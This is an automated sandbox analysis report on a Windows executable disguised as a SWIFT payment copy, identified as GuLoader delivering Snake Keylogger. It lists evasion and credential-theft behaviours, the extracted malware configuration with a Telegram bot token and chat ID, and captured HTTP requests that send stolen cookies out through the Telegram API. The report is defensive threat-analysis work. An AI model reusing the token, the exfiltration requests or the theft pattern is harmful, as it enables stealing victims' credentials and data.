Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Swift Copy_18.02.2025.exe

Overview

General Information

Sample name:Swift Copy_18.02.2025.exe
Analysis ID:1618564
MD5:4a1f527399836a20e0c648007bd75c4f
SHA1:2155f638fc81a0ff83da6dbd57375ff7bb22d09e
SHA256:151e5e6525dafef00671528a54c639918f7598b0d0b36fa2de0bc92db585e7b1
Tags:exesignedSWIFTuser-cocaman
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Swift Copy_18.02.2025.exe (PID: 7808 cmdline: "C:\Users\user\Desktop\Swift Copy_18.02.2025.exe" MD5: 4A1F527399836A20E0C648007BD75C4F)
    • Swift Copy_18.02.2025.exe (PID: 7124 cmdline: "C:\Users\user\Desktop\Swift Copy_18.02.2025.exe" MD5: 4A1F527399836A20E0C648007BD75C4F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY", "Chat_id": "8173633564", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
    00000006.00000002.3916059325.0000000035EA5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000000.00000002.2822262362.0000000004E4B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000006.00000002.3877810810.00000000035FB000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-19T00:27:58.114371+010028033053Unknown Traffic192.168.2.849716104.21.32.1443TCP
            2025-02-19T00:28:01.795360+010028033053Unknown Traffic192.168.2.849722104.21.32.1443TCP
            2025-02-19T00:28:04.259420+010028033053Unknown Traffic192.168.2.849726104.21.32.1443TCP
            2025-02-19T00:28:05.453775+010028033053Unknown Traffic192.168.2.849728104.21.32.1443TCP
            2025-02-19T00:28:06.701581+010028033053Unknown Traffic192.168.2.849730104.21.32.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-19T00:27:56.370293+010028032742Potentially Bad Traffic192.168.2.849714158.101.44.24280TCP
            2025-02-19T00:27:57.511002+010028032742Potentially Bad Traffic192.168.2.849714158.101.44.24280TCP
            2025-02-19T00:27:58.760973+010028032742Potentially Bad Traffic192.168.2.849717158.101.44.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-19T00:27:52.024173+010028032702Potentially Bad Traffic192.168.2.849712142.250.185.206443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-19T00:28:14.533139+010018100081Potentially Bad Traffic192.168.2.849732149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-19T00:28:07.631814+010018100071Potentially Bad Traffic192.168.2.849731149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY", "Chat_id": "8173633564", "Version": "4.4"}
            Source: Swift Copy_18.02.2025.exe.7124.6.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY/sendMessage"}
            Source: Swift Copy_18.02.2025.exeVirustotal: Detection: 25%Perma Link
            Source: Swift Copy_18.02.2025.exeReversingLabs: Detection: 21%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390687A8 CryptUnprotectData,6_2_390687A8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39068EF1 CryptUnprotectData,6_2_39068EF1
            Source: Swift Copy_18.02.2025.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49715 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.8:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.8:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49731 version: TLS 1.2
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405731
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_004061E5 FindFirstFileW,FindClose,0_2_004061E5
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_00402706 FindFirstFileW,6_2_00402706
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_00405731
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_004061E5 FindFirstFileW,FindClose,6_2_004061E5
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 055AF45Dh6_2_055AF4AC
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 055AF45Dh6_2_055AF2D0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 055AFC19h6_2_055AF974
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E7D069h6_2_38E7CDC0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E73308h6_2_38E72EF0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E72D41h6_2_38E72A90
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E7F781h6_2_38E7F4D8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E7F329h6_2_38E7F080
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_38E70040
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_38E70853
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E7EED1h6_2_38E7EC28
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E7FBD9h6_2_38E7F930
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E73308h6_2_38E72EED
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E7DD71h6_2_38E7DAC8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_38E70673
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E7D919h6_2_38E7D670
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E73308h6_2_38E73236
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E7D4C1h6_2_38E7D218
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E7EA79h6_2_38E7E7D0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E7E621h6_2_38E7E378
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E7E1C9h6_2_38E7DF20
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E70D0Dh6_2_38E70B30
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 38E716F8h6_2_38E70B30
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906B5E6h6_2_3906B318
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39067EB5h6_2_39067B78
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39069280h6_2_39068FB0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906E816h6_2_3906E548
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39060FF1h6_2_39060D48
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906C826h6_2_3906C558
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39061449h6_2_390611A0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906ECA6h6_2_3906E9D8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906CCB6h6_2_3906C9E8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390618A1h6_2_390615F8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906DEF6h6_2_3906DC28
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390662D9h6_2_39066030
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906BF06h6_2_3906BC38
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390602E9h6_2_39060040
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39063709h6_2_39063460
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then mov esp, ebp6_2_3906B081
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390632B1h6_2_3906308D
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39066733h6_2_39066488
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39060741h6_2_39060498
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906E386h6_2_3906E0B8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906C396h6_2_3906C0C8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39060B99h6_2_390608F0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390625A9h6_2_39062300
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906D5D6h6_2_3906D308
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390679C9h6_2_39067720
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390655D1h6_2_39065328
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39062A01h6_2_39062758
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39065A29h6_2_39065780
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906FA56h6_2_3906F788
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906DA66h6_2_3906D798
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906BA76h6_2_3906B7A8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39062E59h6_2_39062BB0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39065E81h6_2_39065BD8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39066CC1h6_2_39066A18
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390648C9h6_2_39064620
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39061CF9h6_2_39061A50
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906F136h6_2_3906EE68
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39067119h6_2_39066E70
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906D146h6_2_3906CE78
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39064D21h6_2_39064A78
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39062151h6_2_39061EA8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39067571h6_2_390672C8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39065179h6_2_39064ED0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 3906F5C6h6_2_3906F2F8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D6E38h6_2_390D6B40
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D6970h6_2_390D6678
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D6347h6_2_390D5FD8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D4BD7h6_2_390D4908
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D7300h6_2_390D7008
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DE0F8h6_2_390DDE00
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D2BE6h6_2_390D2918
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DC910h6_2_390DC618
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D19DEh6_2_390D1710
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D9E08h6_2_390D9B10
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D54F6h6_2_390D5228
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D8620h6_2_390D8328
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DF418h6_2_390DF120
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D3506h6_2_390D3238
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DDC30h6_2_390DD938
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DB128h6_2_390DAE30
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D5E16h6_2_390D5B48
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D9940h6_2_390D9648
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D030Eh6_2_390D0040
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D3E26h6_2_390D3B58
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DEF50h6_2_390DEC58
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DC448h6_2_390DC150
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DAC60h6_2_390DA968
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D0C2Eh6_2_390D0960
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D8158h6_2_390D7E60
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D4746h6_2_390D4478
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DD768h6_2_390DD470
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D2756h6_2_390D2488
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DBF80h6_2_390DBC88
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D154Eh6_2_390D1280
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D9478h6_2_390D9180
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D5066h6_2_390D4D98
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D7C90h6_2_390D7998
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DEA88h6_2_390DE790
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D3076h6_2_390D2DA8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DD2A0h6_2_390DCFA8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D1E47h6_2_390D1BA0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DA798h6_2_390DA4A0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D5986h6_2_390D56B8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D8FB0h6_2_390D8CB8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DFDA8h6_2_390DFAB0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D3996h6_2_390D36C8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DE5C0h6_2_390DE2C8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DBAB8h6_2_390DB7C0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DA2D0h6_2_390D9FD8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D079Eh6_2_390D04D0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D77C8h6_2_390D74D0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D42B6h6_2_390D3FE8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DF8E0h6_2_390DF5E8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DCDD8h6_2_390DCAE0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D22C6h6_2_390D1FF8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390DB5F0h6_2_390DB2F8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D10BEh6_2_390D0DF0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 390D8AE8h6_2_390D87F0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39101FE8h6_2_39101CF0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39100801h6_2_39100508
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39101658h6_2_39101360
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39100CC8h6_2_391009D0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39101B20h6_2_39101828
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39100338h6_2_39100040
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then jmp 39101190h6_2_39100E98
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_39264118
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_39260B32
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_39260BC0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_39260C78
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_39260F8E
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_39264108
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_392640B9

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49732 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49731 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2019/02/2025%20/%2006:03:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY/sendDocument?chat_id=8173633564&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd51106829459fHost: api.telegram.orgContent-Length: 1279
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49717 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49714 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49728 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49716 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49722 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49712 -> 142.250.185.206:443
